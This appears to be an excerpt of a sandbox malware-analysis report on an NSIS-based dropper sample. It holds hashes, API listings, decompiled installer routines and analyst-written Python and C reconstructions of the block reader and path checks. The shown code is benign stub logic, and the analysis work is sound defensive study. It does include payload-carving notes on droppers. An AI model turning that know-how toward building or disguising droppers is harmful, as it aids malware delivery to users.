                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Rendered graph not reproduced. Basic blocks 403377-40347c; calls E0040347F, E004061E1, E00406210; APIs SetFilePointer (403386) and ReadFile (403450).
                                          C-Code - Quality: 92%
                                          			/* Reads one length-prefixed block from the installer's own file.
                                          			 * Layout: a signed 32-bit length, then that many bytes, either copied
                                          			 * into the caller's buffer (_a12, capacity _a16) or streamed to the
                                          			 * output handle _a8 in 0x4000-byte chunks through the static buffer
                                          			 * at 0x793730. Globals: *0x40a01c = file handle, *0x7a8af8 = base
                                          			 * offset of the data block, *0x79f734 = running read position.
                                          			 * Returns the byte count (>= 0), -3 (0xfffffffd) on read failure,
                                          			 * -2 (0xfffffffe) on write failure, or the negative status of
                                          			 * E0040347F. Analyst annotation, not part of the sandbox output: this
                                          			 * is the shape of the NSIS stub's data-block reader, which fits the
                                          			 * "nsa" temp-file prefix seen in the GetTempFileNameW call above. */
                                          			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                          				long _v8;
                                          				long _t21;
                                          				long _t22;
                                          				void* _t24;
                                          				long _t26;
                                          				int _t27;
                                          				long _t28;
                                          				void* _t30;
                                          				long _t31;
                                          				long _t32;
                                          				long _t36;
                                          
                                          				_t21 = _a4;
                                          				if(_t21 >= 0) { // offset >= 0: seek to base + offset; a negative offset continues from the current position
                                          					_t32 = _t21 +  *0x7a8af8;
                                          					 *0x79f734 = _t32;
                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                          				}
                                          				_t22 = E0040347F(4); // make sure the 4-byte length field is available
                                          				if(_t22 >= 0) {
                                          					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed: read the length into _a4
                                          					if(_t24 == 0) {
                                          						L18:
                                          						_push(0xfffffffd); // read failure: return -3
                                          						goto L19;
                                          					} else {
                                          						 *0x79f734 =  *0x79f734 + 4;
                                          						_t36 = E0040347F(_a4); // make sure the whole block is available
                                          						if(_t36 < 0) {
                                          							L21:
                                          							_t22 = _t36; // return the byte count (or the ensure status)
                                          						} else {
                                          							if(_a12 != 0) { // caller buffer supplied: one read, silently cut to _a16 bytes
                                          								_t26 = _a4;
                                          								if(_t26 >= _a16) {
                                          									_t26 = _a16;
                                          								}
                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                          								if(_t27 != 0) {
                                          									_t36 = _v8; // bytes actually read
                                          									 *0x79f734 =  *0x79f734 + _t36;
                                          									goto L21;
                                          								} else {
                                          									goto L18;
                                          								}
                                          							} else { // no buffer: stream to the handle in _a8 in 0x4000-byte chunks
                                          								if(_a4 <= 0) {
                                          									goto L21; // empty block: nothing to copy
                                          								} else {
                                          									while(1) {
                                          										_t28 = _a4;
                                          										if(_a4 >= 0x4000) {
                                          											_t28 = 0x4000;
                                          										}
                                          										_v8 = _t28;
                                          										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) { // read one chunk into the static buffer
                                          											goto L18;
                                          										}
                                          										_t30 = E00406210(_a8, 0x793730, _v8); // executed: write the chunk to the output handle
                                          										if(_t30 == 0) {
                                          											_push(0xfffffffe); // write failure: return -2
                                          											L19:
                                          											_pop(_t22);
                                          										} else {
                                          											_t31 = _v8;
                                          											_a4 = _a4 - _t31; // remaining bytes in the block
                                          											 *0x79f734 =  *0x79f734 + _t31;
                                          											_t36 = _t36 + _t31; // bytes copied so far
                                          											if(_a4 > 0) {
                                          												continue;
                                          											} else {
                                          												goto L21;
                                          											}
                                          										}
                                          										goto L22;
                                          									}
                                          									goto L18;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				L22:
                                          				return _t22;
                                          			}
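                                          The following Python model of the block reader decompiled as E00403377 is an added analyst's reference, not code from the sample or from the sandbox output. It reproduces what the decompile shows: a signed 32-bit length, the to-memory path that silently truncates to the caller's buffer, the streaming path that copies in 0x4000-byte chunks, and the -3 / -2 error codes. Assumptions, labelled in the code as well: E0040347F is modelled as a plain "enough bytes remain" check, the class and function names are hypothetical, and the input image is constructed for the demonstration.

```python
import struct

BUFSIZE = 0x4000   # chunk size of the streaming path (the 0x4000 in the decompile)
ERR_READ = -3      # 0xfffffffd: the ReadFile wrapper E004061E1 returned 0
ERR_WRITE = -2     # 0xfffffffe: the write wrapper E00406210 returned 0


class DataBlockReader:
    """Model of the block reader E00403377 (hypothetical name).

    `image` stands in for the installer file opened on handle *0x40a01c,
    `db_offset` for the data-block base kept at *0x7a8af8 and `pos` for
    the running read position kept at *0x79f734.
    """

    def __init__(self, image: bytes, db_offset: int):
        self.image = image
        self.db_offset = db_offset
        self.pos = 0

    def _ensure(self, n: int) -> int:
        # Assumption about E0040347F: 0 when n more bytes can be read from
        # the current position, negative otherwise. Negative lengths are
        # rejected here; the stub only passes them through signed compares.
        return 0 if 0 <= n <= len(self.image) - self.pos else ERR_READ

    def _read(self, n: int):
        # Counterpart of E004061E1: read exactly n bytes and advance pos.
        chunk = self.image[self.pos:self.pos + n]
        if len(chunk) != n:
            return None
        self.pos += n
        return chunk

    def read_block(self, offset: int, out_len=None, sink=None):
        """Return (status, payload) for the block at db_offset + offset.

        offset < 0 continues from the current position, which is how the
        stub reads consecutive blocks. With out_len set the to-memory path
        (_a12 != 0) is taken and the payload is cut to out_len without any
        error; otherwise the payload goes to sink(chunk) -> bool in
        BUFSIZE pieces, as the stub writes it to the handle in _a8.
        """
        if offset >= 0:
            self.pos = self.db_offset + offset           # SetFilePointer
        r = self._ensure(4)
        if r < 0:
            return r, b""
        hdr = self._read(4)
        if hdr is None:
            return ERR_READ, b""
        (length,) = struct.unpack("<i", hdr)              # signed, like the stub
        r = self._ensure(length)
        if r < 0:
            return r, b""

        if out_len is not None:                           # buffer supplied
            n = min(length, out_len)
            data = self._read(n)
            if data is None:
                return ERR_READ, b""
            return n, data

        total, out = r, bytearray()                       # _t36 starts at the ensure result
        while length > 0:                                 # stream in 0x4000-byte chunks
            n = min(length, BUFSIZE)
            chunk = self._read(n)
            if chunk is None:
                return ERR_READ, bytes(out)
            if sink is not None and not sink(chunk):
                return ERR_WRITE, bytes(out)
            out += chunk
            length -= n
            total += n
        return total, bytes(out)


def build_sample_image():
    """Constructed input, not taken from the sample: 16 bytes of padding
    standing in for the stub, then two back-to-back blocks; the second is
    BUFSIZE + 1 bytes long so the streaming path needs two chunks."""
    second = (bytes(range(256)) * 65)[:BUFSIZE + 1]
    image = (bytes(16)
             + struct.pack("<i", 5) + b"hello"
             + struct.pack("<i", len(second)) + second)
    return image, second


def demo():
    """Exercise the paths a dropper analyst cares about."""
    image, second = build_sample_image()
    rdr = DataBlockReader(image, 16)
    first = rdr.read_block(0, out_len=64)                 # to-memory read
    chunks = []
    status, data = rdr.read_block(-1, sink=lambda c: chunks.append(len(c)) or True)
    truncated = DataBlockReader(image, 16).read_block(0, out_len=3)
    short = bytes(16) + struct.pack("<i", 100) + b"xx"    # length past end of file
    bad = DataBlockReader(short, 16).read_block(0, out_len=200)
    return {"first": first,
            "second": (status, data == second, chunks),
            "truncated": truncated,
            "bad": bad}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

                                          Two behaviours of the routine matter when carving payloads out of a dropper like this one: a block read into a fixed buffer is cut to the buffer size without any error, so a short buffer hides the true block length, and a length field that points past the end of the file is caught by the ensure check, not by ReadFile, which is why the -3 path above is only reached on a genuine I/O error.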

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID: 07y
                                          • API String ID: 973152223-1660179758
                                          • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                          • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                                          • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                          • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Rendered graph not reproduced. Basic blocks 405d32-405d77; call E00406139; APIs RemoveDirectoryW (405d4d), DeleteFileW (405d55) and SetFileAttributesW (405d6b).
                                          C-Code - Quality: 41%
                                          			/* Removes a file, or a directory when bit 0 of _a8 is set, after
                                          			 * E00406139 has read the entry's attributes into _t13 and cleared them
                                          			 * (see the GetFileAttributesW / SetFileAttributesW subcalls listed
                                          			 * below); _t13 == -1 means the attribute lookup failed and nothing is
                                          			 * touched. If the delete fails the original attributes are put back
                                          			 * unless bit 2 of _a8 is set. Returns 1 on success, 0 otherwise.
                                          			 * Analyst annotation: clearing read-only/system attributes before
                                          			 * deleting is the NSIS stub's delete helper; the comments are not part
                                          			 * of the sandbox output. */
                                          			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
                                          				int _t9;
                                          				long _t13;
                                          				WCHAR* _t14;
                                          
                                          				_t14 = _a4;
                                          				_t13 = E00406139(_t14); // original attributes, cleared on disk; -1 on failure
                                          				if(_t13 == 0xffffffff) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				_push(_t14);
                                          				if((_a8 & 0x00000001) == 0) { // bit 0 selects directory removal
                                          					_t9 = DeleteFileW();
                                          				} else {
                                          					_t9 = RemoveDirectoryW(); // executed
                                          				}
                                          				if(_t9 == 0) {
                                          					if((_a8 & 0x00000004) == 0) { // bit 2 set: leave attributes cleared
                                          						SetFileAttributesW(_t14, _t13); // restore the original attributes
                                          					}
                                          					goto L8;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                            • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                          • String ID:
                                          • API String ID: 1655745494-0
                                          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                                          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Rendered graph not reproduced. Basic blocks 406ae6-406b25; call E00406A77; APIs WaitForSingleObject (406ae6, 406b00) and GetExitCodeProcess (406b12).
                                          C-Code - Quality: 100%
                                          			/* Waits for the child process in _a4 to exit: polls with a 100 ms
                                          			 * (0x64) timeout and, while WaitForSingleObject reports WAIT_TIMEOUT
                                          			 * (0x102), calls E00406A77(0xf), 0xf being WM_PAINT, so the installer
                                          			 * window keeps repainting. Returns the child's exit code. Analyst
                                          			 * annotation: same shape as the NSIS stub's WaitForProcess; the
                                          			 * comments are not part of the sandbox output. */
                                          			E00406AE6(void* __ecx, void* _a4) {
                                          				long _v8;
                                          				long _t6;
                                          
                                          				_t6 = WaitForSingleObject(_a4, 0x64);
                                          				while(_t6 == 0x102) { // WAIT_TIMEOUT: pump the UI and poll again
                                          					E00406A77(0xf);
                                          					_t6 = WaitForSingleObject(_a4, 0x64);
                                          				}
                                          				GetExitCodeProcess(_a4,  &_v8); // executed
                                          				return _v8;
                                          			}

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CodeExitProcess
                                          • String ID:
                                          • API String ID: 2567322000-0
                                          • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                          • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                                          • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                          • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Rendered graph not reproduced. Basic blocks 403c2b-403c6c; calls E00403C88, E00405D7A; API CloseHandle (403c3c, 403c50).
                                          C-Code - Quality: 100%
                                          			/* Shutdown path: closes the two global handles (*0x40a018 and
                                          			 * *0x40a01c, the latter being the installer's own file handle read by
                                          			 * E00403377) and marks each invalid (|= 0xffffffff is
                                          			 * INVALID_HANDLE_VALUE), calls E00403C88, then hands the buffer at
                                          			 * 0x7b6000 (the string xref at 00403C30 resolves it to
                                          			 * C:\Users\user\AppData\Local\Temp\ in this dump) to E00405D7A with
                                          			 * flags 7, i.e. the delete helper removes the temp path with bits 0,
                                          			 * 1 and 2 set. Analyst annotation: this is the NSIS stub's CleanUp
                                          			 * (DEL_DIR|DEL_RECURSE|DEL_REBOOT on the temp directory); the _t11
                                          			 * argument is a decompiler artifact (the just-invalidated handle). */
                                          			E00403C2B() {
                                          				void* _t1;
                                          				void* _t2;
                                          				void* _t4;
                                          				signed int _t11;
                                          
                                          				_t1 =  *0x40a018; // 0xffffffff
                                          				if(_t1 != 0xffffffff) {
                                          					CloseHandle(_t1); // executed
                                          					 *0x40a018 =  *0x40a018 | 0xffffffff; // INVALID_HANDLE_VALUE
                                          				}
                                          				_t2 =  *0x40a01c; // 0xffffffff
                                          				if(_t2 != 0xffffffff) {
                                          					CloseHandle(_t2);
                                          					 *0x40a01c =  *0x40a01c | 0xffffffff; // INVALID_HANDLE_VALUE
                                          					_t11 =  *0x40a01c;
                                          				}
                                          				E00403C88();
                                          				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed: remove the temp directory
                                          				return _t4;
                                          			}

                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2962429428-4017390910
                                          • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                          • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                                          • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                          • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered as an image on the original page; legend: Executed / Not Executed). Basic blocks 4015c1 through 402c39 of E004015C1, with calls to 402da6, 405fe8, 405f6a, 405c1c, 405c39, 405b9f, 401423, 40666e, GetFileAttributesW and SetCurrentDirectoryW.
                                          C-Code - Quality: 86%
                                          			E004015C1(short __ebx, void* __eflags) {
                                          				void* _t17;
                                          				int _t23;
                                          				void* _t25;
                                          				signed char _t26;
                                          				short _t28;
                                          				short _t31;
                                          				short* _t34;
                                          				void* _t36;
                                          
                                          				_t28 = __ebx;
                                          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                          				_t17 = E00405FE8(_t16);
                                          				_t32 = _t17;
                                          				if(_t17 != __ebx) {
                                          					do {
                                          						_t34 = E00405F6A(_t32, 0x5c); // 0x5c == L'\\': find the next path separator, or the terminating NUL
                                          						_t31 =  *_t34;
                                          						 *_t34 = _t28; // _t28 (ebx) is zero throughout: cut the string here so the buffer holds one more prefix
                                          						if(_t31 != _t28) {
                                          							L5:
                                          							_t25 = E00405C1C( *(_t36 + 8));
                                          						} else {
                                          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
                                          								goto L5;
                                          							} else {
                                          								_t25 = E00405B9F( *(_t36 + 8)); // executed; wraps CreateDirectoryW (see APIs below) and yields 0 or a Win32 error code
                                          							}
                                          						}
                                          						if(_t25 != _t28) {
                                          							if(_t25 != 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS (183)
                                          								L9:
                                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1; // any other failure: bump the per-call error count
                                          							} else {
                                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                          								if((_t26 & 0x00000010) == 0) { // 0x10 == FILE_ATTRIBUTE_DIRECTORY: an existing directory is fine, an existing file counts as an error
                                          									goto L9;
                                          								}
                                          							}
                                          						}
                                          						 *_t34 = _t31; // put the separator back and continue with the next component
                                          						_t32 = _t34 + 2;
                                          					} while (_t31 != _t28); // stops after the component that ended at the NUL has been handled
                                          				}
                                          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                          					_push(0xfffffff5);
                                          					E00401423();
                                          				} else {
                                          					E00401423(0xffffffe6);
                                          					E0040666E(0x7b4000,  *(_t36 + 8));
                                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed; this branch (parameter at ebp-0x2c non-zero) also switches the working directory
                                          					if(_t23 == 0) {
                                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1; // SetCurrentDirectoryW failed: bump the error count
                                          					}
                                          				}
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4)); // fold the per-call error count into the global error counter at 0x7a8b28
                                          				return 0;
                                          			}

                                          APIs
                                            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                            • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                          • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID:
                                          • API String ID: 1892508949-0
                                          • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                          • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                                          • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                          • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00406045(void* __eflags, intOrPtr _a4) {
                                          				int _t11;
                                          				signed char* _t12;
                                          				long _t16;
                                          				intOrPtr _t18;
                                          				intOrPtr* _t21;
                                          				signed int _t23;
                                          
                                          				E0040666E(0x7a4790, _a4);
                                          				_t21 = E00405FE8(0x7a4790);
                                          				if(_t21 != 0) {
                                          					E004068F5(_t21);
                                          					if(( *0x7a8ab8 & 0x00000080) == 0) { // flag bit 0x80 clear: the empty-remainder check at the bottom is skipped
                                          						L5:
                                          						_t23 = _t21 - 0x7a4790 >> 1;
                                          						while(1) {
                                          							_t11 = lstrlenW(0x7a4790);
                                          							_push(0x7a4790);
                                          							if(_t11 <= _t23) {
                                          								break;
                                          							}
                                          							_t12 = E004069A4();
                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) { // 0x10 == FILE_ATTRIBUTE_DIRECTORY: keep walking while this prefix is absent or a directory; an existing file falls through to return 0
                                          								E00405F89(0x7a4790); // shortens the buffer to the next outer prefix (the loop runs while lstrlenW(buffer) exceeds the root length)
                                          								continue;
                                          							} else {
                                          								goto L1;
                                          							}
                                          						}
                                          						E00405F3D();
                                          						_t16 = GetFileAttributesW(??); // executed
                                          						return 0 | _t16 != 0xffffffff; // 0xffffffff == INVALID_FILE_ATTRIBUTES: valid only if the remaining prefix exists
                                          					}
                                          					_t18 =  *_t21;
                                          					if(_t18 == 0 || _t18 == 0x5c) { // remainder after 00405FE8 is empty or starts with L'\\' (0x5c): rejected while flag bit 0x80 is set
                                          						goto L1;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				}
                                          				L1:
                                          				return 0;
                                          			}

                                          APIs
                                            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                          • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
                                          • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID:
                                          • API String ID: 3248276644-0
                                          • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                          • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                                          • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                          • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                                          Uniqueness

                                          Uniqueness Score: -1.00%
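
The two routines above (E004015C1, which creates the requested directory one component at a time, and E00406045, which decides whether a candidate install directory is usable) are easier to follow in plain C. The block below is an added example written for this page, not code from the sample and not NSIS source: create_dir_tree() mirrors the loop in E004015C1 (cut the path at each 0x5c separator, create that prefix, accept ERROR_ALREADY_EXISTS only when the existing object carries FILE_ATTRIBUTE_DIRECTORY, count every other outcome as an error) and is_valid_instpath() mirrors E00406045 (require a root, reject any prefix that exists but is not a directory, require the root itself to exist). The fs_ops callback table, the fake_fs in-memory volume and its contents, the demo_ops() helper and the restriction to drive-letter roots are all assumptions of the example; the callbacks stand in for CreateDirectoryW and GetFileAttributesW so the code compiles and runs on any platform.

```c
/* Added example, not the sample's own code and not NSIS source: readable reconstructions
 * of the two decompiled path routines above, create_dir_tree() after E004015C1 and
 * is_valid_instpath() after E00406045, with disk access behind callbacks so it runs anywhere. */
#include <string.h>
#define ERR_ALREADY_EXISTS 183   /* Win32 ERROR_ALREADY_EXISTS, the 0xb7 tested in E004015C1 */
#define ERR_PATH_NOT_FOUND 3     /* Win32 ERROR_PATH_NOT_FOUND */
#define ATTR_DIRECTORY     0x10  /* FILE_ATTRIBUTE_DIRECTORY, the 0x10 masked in both routines */
#define PATH_CAP           512
typedef struct {
    int (*attrs)(void *ctx, const char *path);       /* attribute bits, or -1 if absent */
    int (*create_dir)(void *ctx, const char *path);  /* 0 on success, else a Win32-style code */
    void *ctx;
} fs_ops;
/* "C:\rest" -> pointer to "rest"; NULL when the path has no drive root (UNC not handled). */
static char *skip_root(char *p) { return (p[0] && p[1] == ':' && p[2] == '\\') ? p + 3 : NULL; }

/* E004015C1: create each prefix in turn; "already exists" is accepted only for a directory.
 * Returns the number of failed components (the stub adds this to a global error counter). */
int create_dir_tree(const char *path, const fs_ops *fs)
{
    char buf[PATH_CAP], c, *p;
    int errors = 0;
    if (strlen(path) >= sizeof buf) return 1;
    strcpy(buf, path);
    if ((p = skip_root(buf)) == NULL) return 0;        /* no root: the stub skips the loop */
    do {
        while (*p && *p != '\\') p++;                  /* next separator (0x5c) or end */
        c = *p;
        *p = '\0';                                     /* cut the path at this component */
        int err = fs->create_dir(fs->ctx, buf);
        if (err == ERR_ALREADY_EXISTS) {
            int a = fs->attrs(fs->ctx, buf);
            if (a < 0 || !(a & ATTR_DIRECTORY)) errors++;   /* a file is in the way */
        } else if (err != 0) errors++;
        *p = c;                                        /* put the separator back */
        if (c) p++;
    } while (c != '\0');
    return errors;
}

/* E00406045: the directory needs a root, every prefix that already exists must be a directory
 * (missing ones get created later), and the root itself must exist. no_root_dir mirrors the
 * 0x80 flag bit the stub reads from 0x7a8ab8. */
int is_valid_instpath(const char *path, int no_root_dir, const fs_ops *fs)
{
    char buf[PATH_CAP], *root;
    if (strlen(path) >= sizeof buf) return 0;
    strcpy(buf, path);
    if ((root = skip_root(buf)) == NULL) return 0;
    while (strlen(buf) > (size_t)(root - buf) && buf[strlen(buf) - 1] == '\\')
        buf[strlen(buf) - 1] = '\0';                   /* drop trailing separators */
    if (no_root_dir && (*root == '\0' || *root == '\\')) return 0;
    while (strlen(buf) > (size_t)(root - buf)) {       /* deepest prefix first */
        int a = fs->attrs(fs->ctx, buf);
        if (a >= 0 && !(a & ATTR_DIRECTORY)) return 0; /* an existing file blocks the path */
        *strrchr(buf, '\\') = '\0';                    /* shorten to the parent prefix */
    }
    if (buf[strlen(buf) - 1] != '\\') strcat(buf, "\\");   /* test "X:\" rather than "X:" */
    return fs->attrs(fs->ctx, buf) >= 0;               /* i.e. != INVALID_FILE_ATTRIBUTES */
}

typedef struct { char path[32][PATH_CAP]; int attrs[32]; int n; } fake_fs; /* constructed in-memory volume */
static fake_fs demo_volume;

static int fake_attrs(void *ctx, const char *path)
{
    fake_fs *f = ctx;
    for (int i = 0; i < f->n; i++) if (strcmp(f->path[i], path) == 0) return f->attrs[i];
    return -1;
}

static void fake_add(fake_fs *f, const char *path, int attrs)
{
    if (f->n < 32) { strcpy(f->path[f->n], path); f->attrs[f->n++] = attrs; }
}

/* CreateDirectoryW-like: fails if the entry exists or its parent is not a directory. */
static int fake_create_dir(void *ctx, const char *path)
{
    char parent[PATH_CAP], *sep;
    if (fake_attrs(ctx, path) >= 0) return ERR_ALREADY_EXISTS;
    strcpy(parent, path);
    if ((sep = strrchr(parent, '\\')) == NULL) return ERR_PATH_NOT_FOUND;
    if (sep - parent > 2) *sep = '\0'; else sep[1] = '\0';   /* parent of "C:\x" is "C:\" */
    int pa = fake_attrs(ctx, parent);
    if (pa < 0 || !(pa & ATTR_DIRECTORY)) return ERR_PATH_NOT_FOUND;
    fake_add(ctx, path, ATTR_DIRECTORY);
    return 0;
}

fs_ops demo_ops(void)   /* rebuilds the demo volume (root, two directories, one plain file) */
{
    fs_ops ops = { fake_attrs, fake_create_dir, &demo_volume };
    demo_volume.n = 0;
    fake_add(&demo_volume, "C:\\", ATTR_DIRECTORY);
    fake_add(&demo_volume, "C:\\Program Files", ATTR_DIRECTORY);
    fake_add(&demo_volume, "C:\\Users", ATTR_DIRECTORY);
    fake_add(&demo_volume, "C:\\Users\\notes.txt", 0x20);   /* FILE_ATTRIBUTE_ARCHIVE, a file */
    return ops;
}
```

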